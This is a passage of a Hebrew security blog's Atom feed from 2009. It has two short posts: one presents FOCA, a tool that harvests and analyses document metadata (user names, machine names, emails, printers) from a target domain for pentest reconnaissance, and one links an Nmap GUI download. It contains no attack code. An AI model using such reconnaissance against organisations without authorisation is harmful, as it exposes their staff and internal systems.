term="foca" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="security pen testing tools" /><title>FOCA RC1- כלי חדש לחילוץ METADATA ממסמכים.</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_vzNe-NaiwJI/Sq24DyWobvI/AAAAAAAAADY/_AMW1VC8uEI/s1600-h/foca_pic.JPG"&gt;&lt;img style="text-align: left;float: right; margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 10px; cursor: pointer; width: 400px; height: 230px; " src="http://3.bp.blogspot.com/_vzNe-NaiwJI/Sq24DyWobvI/AAAAAAAAADY/_AMW1VC8uEI/s400/foca_pic.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5381159504973426418" /&gt;&lt;/a&gt;&lt;br /&gt;METADATA = מידע המוסף למסמכים וקבצים ע"י תוכנות עריכה למטרות שימוש התוכנות עצמם .&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;המידע יכול להכיל:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;תאריך ושעה בהם נוצר המסמך&lt;/li&gt;&lt;li&gt;שם המתשמש שיצר את המסמך&lt;/li&gt;&lt;li&gt;שם המחשב או השרת הפנימי&lt;/li&gt;&lt;li&gt;כתובות דואר אלקטרוני&lt;/li&gt;&lt;li&gt;נתיבים המסמכים&lt;/li&gt;&lt;li&gt;שמות מדפסות&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;ניתן לעשות שימוש במידע זה בשלב איסוף הנתונים בהליך ה PENTEST ובמיוחד כשמבצעים BLACK BOX PENTEST.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;FOCA - הוא כלי הלוקח את הגילוי והניתוח שלב אחד קדימה,ע"י הגדרת הדומיין שאותו אנו רוצים לחקור ,הוא מבצע חיפוש לכל סוגי המסמכים המאורכבים במנועי החיפוש ,מוריד אותם למחשב המקומי ,מבצע ניתוח של הMETADATA ומציג אותו לפי קטגוריות ( users,printers'computer'email) וכו.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.informatica64.com/DownloadFOCA/"&gt;להורדת הכלי&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-2085402255400689308?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/KrfApfInxPnA0HBbBtqSwAzn9iw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KrfApfInxPnA0HBbBtqSwAzn9iw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/KrfApfInxPnA0HBbBtqSwAzn9iw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KrfApfInxPnA0HBbBtqSwAzn9iw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/2085402255400689308/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2009/09/foca-rc1-metadata.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/2085402255400689308?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/2085402255400689308?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2009/09/foca-rc1-metadata.html" title="FOCA RC1- כלי חדש לחילוץ METADATA ממסמכים." /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_vzNe-NaiwJI/Sq24DyWobvI/AAAAAAAAADY/_AMW1VC8uEI/s72-c/foca_pic.JPG" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;C0MER3o8eSp7ImA9WxNRGEw.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-4879126357603191680</id><published>2009-08-26T08:35:00.004+03:00</published><updated>2009-09-13T06:10:06.471+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-13T06:10:06.471+03:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="scaning" /><title>NMAP GUI חדש מבית K_ZEE</title><content type="html">&lt;div&gt;&lt;br /&gt;&lt;/div&gt;GUI פשוט יעיל ונוח להרצת NMAP  המכיל פרמטרים להרצת של הסריקות הנפוצות וכל הסקריפטים החדשים.&lt;div&gt;כמובן שיש להתקין NMAP כהתקנה רגילה לפני השימוש ב GUI&lt;br /&gt;&lt;div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;להורדה&lt;/div&gt;&lt;div&gt;&lt;a href="http://rapidshare.com/files/271595506/Nmap_GUI.rar.html"&gt;http://rapidshare.com/files/271595506/Nmap_GUI.rar.html&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-4879126357603191680?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/LkyY_Hf4mKz9FXwIseHtjLziLwI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/LkyY_Hf4mKz9FXwIseHtjLziLwI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/LkyY_Hf4mKz9FXwIseHtjLziLwI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/LkyY_Hf4mKz9FXwIseHtjLziLwI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/4879126357603191680/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2009/08/nmap-gui-kzee.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/4879126357603191680?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/4879126357603191680?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2009/08/nmap-gui-kzee.html" title="NMAP GUI חדש מבית K_ZEE" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry></feed>

